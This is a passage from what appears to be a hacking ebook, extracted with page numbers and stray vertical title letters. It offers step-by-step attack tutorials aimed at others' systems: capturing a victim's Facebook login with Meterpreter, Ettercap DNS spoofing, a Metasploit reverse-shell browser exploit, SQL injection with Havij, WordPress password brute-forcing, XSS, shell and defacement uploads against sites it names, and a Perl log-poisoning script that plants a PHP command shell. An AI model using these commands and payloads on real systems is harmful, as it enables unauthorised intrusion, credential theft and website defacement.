websites using Meterpreter what is Sniffing, imagine a Police dog sniffing for drugs
or bombs, in our case it is the same, here Meterpreter is a "Police dog" and the "drugs
and bombs" are the usernames and the passwords. Lets start sniffing using the
command:
use sniffer
sniffer_start (interface)
Now on the victim side, let's login to facebook.
Wait for some time before dumping the captured results by:
sniffer_dump 1 /root/Desktop/name.cap <--- here what i forgot to mention was that
the "1" is my interface
Now stop the sniffer with sniffer_stop 1 and after a while you should see a .cap
(wireshark extension) file on your desktop, and that can be opened using
WIRESHARK only. So open up a new console in Backtrack and type Wireshark and
this will load the GUI, open up the .cap file from the desktop, browse through the logs
and you will see that you have successfully captured the Facebook login credentials.
163
H
a
c
k
i
n
g

T
r
u
t
h


:::::: DNS SPOOF USING ETTERCAP ::::::

WELL BY NOW I AM GOING TO ASSUME YOU HAVE AT LEAST A LITTLE
EXPERIENCE WITH BACKTRACK (or just a linux distro in general)*

First find and modify etter.dns to what you want forwarded. You can find it at:
/usr/share/ettercap# pico etter.dns
You can delete everything in the file and replace it with something like this:
* A xxx.xx.xxx.xxx
This will redirect all visited websites to whichever site you want, just make sure
to replace xxx with the IP address of that site or wherever you want.
After that we need to fire up ettercap with a simple command to tell it what and
how to attack... the command will look something like this:
ettercap -i NETWORKINTERFACEHERE -TqM ARP:REMOTE -P dns_spoof
/TARGETGATEWAYHERE/ /TARGETMACHINEHERE/
and for an example I would type a command like this:
ettercap -i wlan0 -TqM ARP:REMOTE -P dns_spoof /192.168.1.1/ //
This tells ettercap my network interface is wlan0 (the default wireless network
interface) then tells ettercap to use the plugin (-P) dns_spoof then 192.168.1.1
inbetween the first set of // which is what my gateway is and then leaving the next //
blank attacked all hosts between 192.168.1.0 and 192.168.1.254 so basically all
computers on this network.
J AVA SIGNED APPLET
J ava singed applet is also one of my preferred browser exploits. It is pretty much
like the J AVA Drive By ( http://youtu.be/pT0AlJ LYc5s ) but here we use Meterpreter
:D Go ahead and continue reading.
Open a console and in it, type:
MSFconsole followed by: Search signed
This will get us exploit that we want. Type:
164
H
a
c
k
i
n
g

T
r
u
t
h

use exploit/multi/browser/java_signed_applet
Now let's set the payload to meterpreter.
set payload windows/meterpreter/reverse_tcp
Now simply set LHOST and uripath and you're done.
set LHost 192.168.11.139
set uripath /
exploit

165
H
a
c
k
i
n
g

T
r
u
t
h

WEBSITE HACKING

Basically, website hacking means having undetectable or unauthorised access
to ones website. After that, you use or misuse its database is different thing, you
access the database is the hacking.
Steps involved in generalised website or a system hacking are as follows:
1. Reconnaissance (footprinting).
2. Scanning.
3. Ports & Services Enumeration.
4. Vulnerability Assessment.
5. Vulnerability Exploitation.
6. Penetration and Access.
7. Privilege Escalation & owning the box.
8. Erase tracks.
9. Maintaining access.

Each step is explained in short further
1. Reconnaissance: Its the process of information gathering and footprinting.
By this we can collect a lot information about our target website. If it is done in well
manner can give you more info. And more info means more easy to hack the website.
2. Scanning: This step includes scanning of a website for vulnerabilities. In other
words, using high edge tools in order to perform scanning of loopholes and the system
which host machine is running. Also, it refers to finding of the open ports.
3. Ports & services enumeration: It simply means finding the service which is
running on particular port and checking if its vulnerable.
4. Vulnerability assessment and exploitation: It refers to gaining information
about vulnerability and exploiting it in order to have our work done.
6. Penetration and access: simply accessing admins account.

166
H
a
c
k
i
n
g

T
r
u
t
h

7. Privilege Escalation & owning the box: Once exploitation is successful, and
you have access to admins account, making the website harder to recover back. And
it may include removing other admins accounts etc.,
8. Erase tracks: As it says, there are certain log files which keep tracks of every
single access, so, in order to stay hidden from admin, we need to erase our tracks.
9. Maintaining access: It simply means back-dooring it, such that , making a
loophole by which we will be able to hack any time after this.

WEBSITE SCANNING
There are few important tools out in order to scan a website for open ports and
vulnerabilities, such as Nmap, Uniscan and Nessus, these are popular one and also
most successful!
Here we start with scanning particular website using these tools
UNISCAN: A WEB VULNERABILITY SCANNER TOOL IN BACKTRACK
Uniscan written in perl language. Uniscan is tool built in backtrack and used for
web application testing. Its really a good tool for a penetration tester to test a web
application against the major vulnerabilities like SQL injection, LFI, RFI, XSS etc. It
also scan the server and map the server for open ports, services, banner grabbing
etc. You can say its a small package of blast
So now lets move to uses of this tool. First open your Backtrack and open
terminal and navigate to the Uniscan directory i.e.
Cd /pentest/web/Uniscan




167
H
a
c
k
i
n
g

T
r
u
t
h

Now run this Uniscan tool using this command.
./uniscan.pl


It will give you options from which you can select according to your choice.

For example I am going to scan a website using switches as qweds.
./uniscan.pl u www.your_target[dot]com qweds
168
H
a
c
k
i
n
g

T
r
u
t
h



It will take some time to complete.
You can also use switches as q w e d s. You can also get all output in a text file
by below command:
./uniscan.pl u http://www.your_target[dot]com/ -qweds >
/root/Desktop/report.txt
You can also see a well organized report in html format in below directory.
/pentest/web/uniscan/report.








169
H
a
c
k
i
n
g

T
r
u
t
h

NMAP
Nmap is such a powerful tool to scan huge networks, It is used for various
purposes.
Nmap can also be used to scan the websites for open ports and services
running on them. However, Its graphical version called Zenmap is easy to use, here
I am writing about Nmap.
Nmap best known as hackers best friend may it be ethical or criminal is one of
the best known network scanners available today. Today nearly each and every
hacker uses nmap as network scanning tool and even pen-testing tools are bundled
with Nmap as basic port scanning tool. Nmap can scan network, ports, services and
also garb OS. This tutorial is written keeping this in mind that everyone should be able
to grasp all commands and switches given in this tutorial in single reading. Do you
think its impossible so why not give a try.

First we divide switches into four types,
1. Synchronous Scans
2. Ping Scans
3. Time Scans
4. Output Type

Synchronous Scan:All synchronous scans start with -s(without quotes), note
that the s denoting synchronous is not capital. Now a basic synchronous scan
command is written as follows,

nmap -s[synchronous scan type] ip_address
----------------------------------------------
-sT Synchronous TCP scan
-sS Synchronous Stealth scan (This type of scan most of the time goes
undetected by remote system)

-sF Synchronous FIN Scan (Sends FIN packets with RST flag)
170
H
a
c
k
i
n
g

T
r
u
t
h

-sX XMAS tree scan (A packet is known as XMAS when its all flag are set)
-sU UDP scan
-sN NULL Scan
-sP Ping Scan
-sO Protocol Scan
-sA ACK Scan
-sW Windows Scan
-sR Remote Procedure Call
-sL List DNS
-sI IDLE scan (A scan done with spoofed IP Address)

How to remember all synchronous scans: After reading above switch list you
must have noted all types of scans appears to start with first letter capital of its own
spelling placed next to -s except protocol scan which uses O. So practically you
dont need to remember anything other than which type of scan you want to perform
then post fix -s with its capital letter. Isnt that easy, now consider you want to scan
aaa.bbb.ccc.ddd for its open ports and DNS entries. Note what you want,
-List DNS that means L

So this will be your command,
nmap aaa.bbb.ccc.ddd -sL

If you want to scan UDP protocol then type,
nmap aaa.bbb.ccc.ddd -sO UDP

Note: No two Synchronous Scans can be combined together.
nmap -sS -sU aaa.bbb.ccc.ddd is illegal.

171
H
a
c
k
i
n
g

T
r
u
t
h

Ping Scan: All Ping scans start with -P, note that P is capital and denotes ping.
Now basic ping scan command is written as,

nmap -P[ping scan type] ip_address
-------------------------------------
-Pn No Ping
-PT TCP Ping
-PA ACK Ping
-PU UDP Ping
-PO Protocol Scan
-PS Synchronous Ping
-PI ICMP Ping Echo
-PB UDP ICMP timestamp
-PM ICMP Net Mask or Masked Scan

Now note the next option appearing after P is first letter capital of words own
spelling except protocol ping and timestamp ping. As shown earlier everytime p from
protocol will be replaced by O in scan type. To remember timestamp switch remember
last letter p in timestamp appears like B.



Time Scans: Time switches are denoted by capital T.

-T Paranoid 300 seconds between scans
-T Sneaky 15 seconds between scans
-T Polite 4 seconds between scans
-T Normal Runs parallel scans
172
H
a
c
k
i
n
g

T
r
u
t
h

-T Aggressive 1.25 sec/probe
-T Insane 0.3 sec/probe

To remember time scans first we arrange times in descending order.
300 15 4 - 1.25 0.3

My friend is Paranoid who Sneaks around networks,
300 15
He appears Polite Normally but is Aggressive to the level of Insanity.
4 - 1.25 0.3

I think that will do. All time switches are appended at last of nmap command
nmap aaa.bbb.ccc -sS -T Polite

Output Type: It just formates output as you want. Always starts with -o

-oN Normal Output
-oX XML Output
-oG Grapple Output
-oA All Output

I dont think now to explain how to remember them.

Other Important Switches:
--traceroute works similar as any other trace route program
-R Resolve DNS along with port scan
173
H
a
c
k
i
n
g

T
r
u
t
h

-v Scan in verbose mode
-O OS Scan
-----------------------------------------------------
So heres an example to create scan:
1. Create a Stealth Synchronous scan with normal output with 15 seconds
between each scan. Resolve DNS and use verbose mode?
Ans:
-Scan Type Synchronous means -s
-Subtype stealth -sS
-Use verbose -sS -v
-Resolve DNS -sS -v -R
-Normal Output -sS -v -R -oN
-15 seconds between scans -sS -v -R -oN -T Sneaky

So the answer is,
nmap aaa.bbb.ccc -sS -v -R -oN -T Sneaky

Following are for you try yourself,
2. Create a Ping protocol scan with 0.3 seconds scan difference between ports.
3. Create a Synchronous UDP scan with xml output use verbose mode.

-Nmap tutorial by Team IHA





174
H
a
c
k
i
n
g

T
r
u
t
h










WEBSITE HACKING
Here we will discuss some popular ways of website hacking, Here it is not going
to be much deeper but essential for knowledge.
SQL INJ ECTION (USING HAVIJ )
Havij is a very good sql injector tool. It is used to hack website by sql injection.
Download it from here: http://adfoc.us/10187334395337
SQL injection is one of the most common and most widely used method of
hacking a website now a days. SQL (Structured Query Language) is a language used
to communicate with the database of a website. SQL Injection is a technique used by
a hacker to insert SQL codes into website in order to get sensitive information from
the database like usernames and passwords.
The manual SQL Injection is quite hard to understand for newbies. So i have decided
to publish this post which we will use a tool called "Havij" to carry out our SQl injection
attack!



175
H
a
c
k
i
n
g

T
r
u
t
h


Havij supports the following databases:
MySQL
MySQL error based
MySQL Blind
MsSQL
MsSQL error based
MsSQL Blind
Ms Access
Ms Access Blind
Oracle
Oracle error based
PostgreSQL
Sybase ( ASE )
Sybase ( ASE ) Blind


Okay now for this tutorial we will be using a vulnerable website i found recently. well
lets get started already!!

Finding the Vulnerable Site:
To find a site vulnerable to SQL Injection, just add a single quote ( ' ) after the url of
the wesbite.
Example: http://www.vulnerablesite.com/index.php?id=12'

If the website loads normally, remains the same or shows a 404 error, that means
website is not vulnerable to SQL Injection. However if the website shows an error
related to Database or SQL that means the website is vulnerable to SQL Injection like
this:
176
H
a
c
k
i
n
g

T
r
u
t
h


or you can use the Google dork to find vulnerable sites.
The Attack:
Lets say now you found a vulnerable site and you want to hack it! Now i will Show
you step by step the process of SQL injection.
Step1: Find SQL injection Vulnerability in the site and insert the string
(likehttp://www.target.com/index.asp?id=123) of it in Havij as show below.


Step3: Now click on the Analyse button as shown below.



177
H
a
c
k
i
n
g

T
r
u
t
h

Now if the your Server is Vulnerable the information about the target will appear and
the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below
column as shown below:

178
H
a
c
k
i
n
g

T
r
u
t
h


Step5: Now select the Tables with sensitive information and click Get
Columns button.After that select the Username and Password Column to get the
Username and Password and click on the Get Table button.

Countermeasures:

Here are some of the countermeasures you can take to reduce the risk of SQL
Injection

1.Renaming the admin page will make it difficult for a hacker to locate it
3.Use a Intrusion detection system and compose the signatures for popular SQL
injection strings
4. One of the best method to protect your website against SQL Injection attacks is to
disallow special characters in the admin form, though this will make your passwords
more vulnerable to bruteforce attacks but you can implement a capcha to prevent
these types of attack.








179
H
a
c
k
i
n
g

T
r
u
t
h

HACK WORDPRESS BLOG USING WPSCAN IN BACKTRACK OR KALI
WPScan.rb is a nifty bit of program that allows you to scan WordPress sites for
information as well as do some fun stuff.Say for example you want to "hack" into your
friends WordPress site :-)...or just get some information, whatever.

I'm using BackTrack 5 r3 for this tutorial.
Step1: You can use it to enumerate usernames, so you can see what usernames are
valid on the WordPress site by running this command:
ruby ./wpscan.rb --url www.friends-site.com --enumerate u



Running this command against a real WordPress site will show something like this:

180
H
a
c
k
i
n
g

T
r
u
t
h


Step 2:
Now that you know what the usernames are, you can then try to brute force it
with a list of passwords. This process takes a while, and you have to have a word
list. BackTrack 5 r3 comes with a decent word list, so I'll use that in this example.

ruby ./wpscan.rb --url www.friends-site.com --wordlist
/pentest/passwords/wordlists/darkc0de.lst --username admin

The above command is telling WPScan to attack your friends URL, using the
username "admin" with the word list that is located in
the /pentest/passwords/wordlists/ folder of Back Track 5.
You can even add threading to make the process a little faster by using this
switch:
--threads 50
There are a few more things you can do, including scanning for what plugins
the site uses, as well as telling you which ones are vulnerable.
You can see a full list of options here: http://wpscan.org/
Happy WordPress Hacking!!


181
H
a
c
k
i
n
g

T
r
u
t
h

HACK J OOMLA HOSTED WEBSITE USING J OOMSCAN IN BT OR KALI

J oomscan is one of penetration testing tool that help to find the vulnerability
in J oomla CMS. The Updated version can detects 550 Vulnerabilities. Let me show
how to use this joomscan in Backtrack5.

Download the Joomscan from here:
http://web-center.si/joomscan/joomscan.tar.gz

Step 1: Moving to PenTest folder
Copy/Move the downloaded files in directory
/pentest/web/scanners/joomscan/



Step2: Set Permission
Now you have to set permission for the J oomscan file. In order to this, Type the
following command in Terminal(if you don't know how to open terminal at all, please
stop reading this and start it from basics of Linux).
CHMOD 0777 joomscan.pl




182
H
a
c
k
i
n
g

T
r
u
t
h

Step 3: Update
Update the scanner to latest version. To do this, enter the following command in
Terminal:
./joomscan.pl update



Step 4: Scanning for Vulnerability
Now everything ok, we have to scan our joomla site for vulnerability. To do this, enter
the following command in Terminal:
./joomscan.pl -u www.YourJoomlasite.com





Wait for a while, and it will list of the vulnerability found.

183
H
a
c
k
i
n
g

T
r
u
t
h

CROSS SITE SCRIPTING (XSS)
Cross site scripting is a website vulnerability, which is caused due to a blindly
execution of the commands given in any form by server; and hence a hacker is able
to inject any code into it and server serves the code to peoples. This vulnerability may
lead to stealing of information of all peoples who visit and use the website.
Heres tutorial on XSS!
In a typical XSS attack, a hacker inject his malicious javascript code in the
legitimate website. When a user visit the specially-crafted link, it will execute the
malicious javascript. A successfully exploited XSS vulnerability will allow attackers to
do phishing attacks, steal accounts and even worms.

Example:Let us imagine, a hacker has discovered XSS vulnerability in Gmail
and injectmalicious script. When a user visit the site, it will execute the malicious
script. The malicious code can be used to redirect users to fake gmail page or capture
cookies. Using this stolen cookies, he can login into your account
and change password.
It will be easy to understand XSS, if you have the following prerequisite:

Strong Knowledge in HTML,javascript(Reference).
Basic Knowledge in HTTP client-Server Architecure(Reference)
[optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance "?search="
or ".php?q=" . 1337 target specific sites instead of using google search. If you are
going to test your own site, you have to check every page in your site for the
vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for
example: search box, username, password or any other input fields.

184
H
a
c
k
i
n
g

T
r
u
t
h



Test 1:
Once we found the input field, let us try to put some string inside the field, for
instance let me input "BTS". It will display the result.

Now right click on the page and select view source. Search for the string "BTS"
which we entered in the input field. Note the location where the input is placed.
Test 2:
Now we are going to check whether the server sanitize our input or not. In order
to do this, let us input the <script>tag inside the input field.

View the source of the page. Find the location where input displayed place in
previous test.

Thank god, our code is not being sanitized by the server and the code is just
same as what we entered in the field. If the server sanitize our input, the code may
look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack
and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack. But let us make
sure whether the site is completely vulnerable to this attack by injecting a full javascript
code. For instance, let us input <script>alert('BTS')</script>.
185
H
a
c
k
i
n
g

T
r
u
t
h


Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit
the XSS . By extending the code with malicious script, a hacker can do steal cookies
or deface the site and more.


Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two
types namely Persistent and Non-Persistent.

Persistent XSS:
The Persistent or Stored XSS attack occurs when the malicious code submitted
by attacker is saved by the server in the database, and then permanently it will be run
in the normal page.
For Example:
Many websites host a support forum where registered users can ask their
doubts by posting message, which are stored in the database. Let us imagine, An
attacker post a message containing malicious javascript code instead. If the server
fail to sanitize the input provided, it results in execution of injected script. The code
will be executed whenever a user try to read the post. If suppose the injected code is
cookie stealing code, then it will steal cookie of users who read the post. Using the
cookie, attacker can take control of your account.



186
H
a
c
k
i
n
g

T
r
u
t
h


Non-Persistent XSS:
Non-Persistent XSS, also referred as Reflected XSS, is the most common type
of XSS found now a days. In this type of attack, the injected code will be send to the
server via HTTPrequest. The server embedd the input with the html file and return
the file(HTTPResponse) to browser. When the browser executes the HTML file, it
also execute the embedded script. This kind of XSS vulnerability frequently occur in
search fields.
Example:
Let us consider a project hosting website. To find our favourite project, we will just
input the related-word in the search box. When searching is finished, it will display
a message like this "search results for your word. If the server fail to sanitize the
input properly, it will results in execution of injected script.
In case of reflected XSS attacks, attacker will send the specially-crafted link to
victims and trick them into click the link. When user click the link, the browser will send
the injected code to server, the server reflects the attack back to the users'
browser. The browser then executes the code.

What can an attacker do with this Vulnerability?

Stealing the Identity and Confidential Data (credit card details).
Bypassing restriction in websites.
Session Hijacking(Stealing session)
Malware Attack
Website Defacement
Denial of Service attacks(Dos)




187
H
a
c
k
i
n
g

T
r
u
t
h

HOW TO HACK A WEBSITE WITH BASIC HTML CODING
1. Open the site you want to hack. Provide wrong username/password
combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An
error will occur saying wrong username-password. Now be prepared your experiment
starts from here.
2. Right click anywhere on that error page =>>go to view source.
3. There you can see the HTML coding with J avaScript. There you find
somewhat like this....<_form action="...Login...."> Before this login information copy
the URL of the site in which you are.
4. Then delete the J avaScript from the above that validates your information in
the server.(Do this very carefully, your success to hack the site depends upon this i.e.
how efficiently you delete the java scripts that validate your account information) .
5. Then take a close look for "<_input name="password"
type="password">"[without quotes] -> replace "<_type=text> there instead of
"<_type=password>". See there if maximum length of password is less than 11 then
increase it to 11 (e.g. : if then write ).
6. J ust go to file =>save as and save it anywhere in your hard disk with
ext.html(e.g.: c:\chan.html)
7. Reopen your target web page by double clicking 'chan.html' file that you
saved in your hard disk earlier. You see that some changes in current page as
compared to original One. Don't worry.
8. Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have
successfully cracked the above website and entered into the account of List user
saved in the server's database.
J ust Try this.


188
H
a
c
k
i
n
g

T
r
u
t
h

SPAW VULNERABILITY
Spaw is a Vulnerability, you Can Upload your deface & Shell Easily in
Vulnerable websites
Lets Start
Open www.google.com
Search for any of these dorks in Google
inurl:" spaw2/dialogs/"
inurl:" spaw2/uploads/files/"
You will Get results Like this "Index of/ spaw2/dialogs/"
or : site.com/abc/spaw2/uploads/files/abc/abc.pdf
Now replace The Spaw2/Uploads/abc/abc ur with this url
******** start*************
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&=
es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
*******end***********
or example i got this website
--------------------------------------------------
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/%20Climate%2
0Change.pdf
---------------------------------------------------
I will replace;
__________________________________________________________
/Admin/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8
%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf with
/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E
0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf
______________________________________________________________

189
H
a
c
k
i
n
g

T
r
u
t
h

with
_________________________________________________________________
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&l
ang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
__________________________________________________________________

AND So The Final URL Is this:
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spa
wfm&dialog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52
235494da752d98cac9&type=files< />
Now you will Got a window Click on the Link to see That window:
(http://tinyurl.com/894s6qd )
If you want to Upload deface page then Select files option ... and i f you want to upload
shell then select image option and upload your shell as shell.php;,jpg
See you uploaded deface here
www.site.com/profile/spaw2/uploads/


190
H
a
c
k
i
n
g

T
r
u
t
h

UPLOADING YOUR SHELL VIA IMAGES USING TAMPER DATA.
Many times you get login of a website, but you are unable to upload your PHP
shell! i'll show you how to upload your PHP shell through Tamper Data an Firefox
Add-on. Install Tamper Data firefox add-on:
Download Tamper Data here : https://addons.mozilla.org/en-
us/firefox/addon/tamper-data/
Now Install it and Restart Firefox
Rename shell:
Note: You have to rename you .php shell to .jpg to bypass the website's security,
To upload a shell, of-course you needed a upload option in login page or
anywhere!
Demo:
o As an example i'll take - http://freead1.net/post-free-ad-to-USA-42
o It is a free classified ads posting website,
o So I got a upload option there!
o Find your upload option click on browse,
o Locate you .jpg shell and select it!
Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data
plugin will open in a new window!
Before Clicking on Upload button click on "Start Tamper" in Tamper Data
window.
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.
Now click on upload button!
After clicking on upload button "Tamper with request?" window will appear!
Click on "Tamper" button
After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad
After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.
Now copy Notepad's text back to "POST_DATA" field and click OK
It will Upload the shell as .php and you can execute it easily!
Find your .php shell & do whatever you wanted with that website
That's all!


191
H
a
c
k
i
n
g

T
r
u
t
h

LOCAL FILE INCLUSION ATTACK:

Note: Only For Educational Purpose.>!!!
Local File Inclusion (LFI) is when you have the ability to browse through the server by
means of directory transversal. One of the most common uses of LFI is to discover
the /etc/passwd file. This file contains the user information of a Linux system.
Hackers find sites vulnerable to LFI the same way I discussed for RFIs.
Lets say a hacker found a vulnerable site,
www.target-site.com/index.php?p=about,
By means of directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd
The ../ you up one directory and the amount to use depends where in the server you
are located compared the location of the /etc/passwd file. If the hacker is able to
successfully get to the /etc/passwd file he would see a list similar to the one below.
Root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
Each line is divided into seven parts:
username:passwd:UserID:GroupID:full_name:directory:shell
If the password hash was shown, the hacker would be able to crack it and get access
to the machine, but in our case the password isnt shown. This means that the
password is shadowed and in the /etc/shadow file which the hacker doesnt have
access to. If this was the case, the hacker would probably attempt to get access to
the system another way, through log injection.
The log directories are located in different areas in different Linux distributions.
192
H
a
c
k
i
n
g

T
r
u
t
h

Below is a list of the most common locations.
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
193
H
a
c
k
i
n
g

T
r
u
t
h

../../../../../../../var/log/apache2/error_log 112
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Below are the steps a hacker would take to take gain access to the system through
log injection.
1. First the hacker would find what operating system version the target server is
running and then search where the log files are located on that OS.
2. Next, through LFI the hacker would navigate to that file location. If he is displayed
with a bunch of logs, then he may continue.
3. The hacker would then inject some PHP code into the logs by typing <?
Passthru($_GET*cmd+) ?> after =in the URL. This will cause the PHP script to be
logged because there is no file by that name. What this script will do is give the hacker
shell access and allow him to execute system commands.
4. Now if the hacker goes back to the log file, he will see that his PHP script wasnt
parsed and instead converted to
%3C?%20passthru($_GET[cmd])%20?%3E
5. When you submitted the script, the browser automatically encoded the URL. Luckily
there is a pearl script that can get around this problem. Below is the pearl script, edit
the variables: $site, $path, $code, and $log to the appropriate information.
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site= www.vulnerablesite.com ;
$path= / ;
$code= <? Passthru(\$_GET[cmd]) ?> ;
$log = ../../../../../../../etc/httpd/logs/error_log ;
print Trying to inject the code ;
$socket = IO::Socket::INET->new(Proto=> tcp , PeerAddr=> $site ,
PeerPort=> 80 ) or die \nConnection Failed.\n\n ;
194
H
a
c
k
i
n
g

T
r
u
t
h

print $socket GET .$path.$code. HTTP/1.1\r\n ;
print $socket User-Agent: .$code. \r\n ;
print $socket Host: .$site. \r\n ;
print $socket Connection: close\r\n\r\n ;
close($socket);
print \nCode $code successfully injected in $log \n ;
print \nType command to run or exit to end: ;
$cmd = <STDIN>;
while($cmd !~ exit ) {
$socket = IO::Socket::INET->new(Proto=> tcp , PeerAddr=> $site ,
PeerPort=> 80 ) or die \nConnection Failed.\n\n ;
print $socket GET .$path. index.php?filename= .$log. &cmd=$cmd
HTTP/1.1\r\n ;
print $socket Host: .$site. \r\n ;
print $socket Accept: */*\r\n ;
print $socket Connection: close\r\n\n ;
while ($show = <$socket>)
{
print $show;
}
print Type command to run or exit to end: ;
$cmd = <STDIN>;
}
6. Once the hacker runs this script and it goes successfully, he will be able to run any
command on the server. From here he can run any local exploits to gain root, or just
browse the server files.
Note: Only For Educational Purpose.

195
H
a
c
k
i
n
g

T
r
u
t
h

196
H
a
c
k
i
n
g

T
r
u
t
h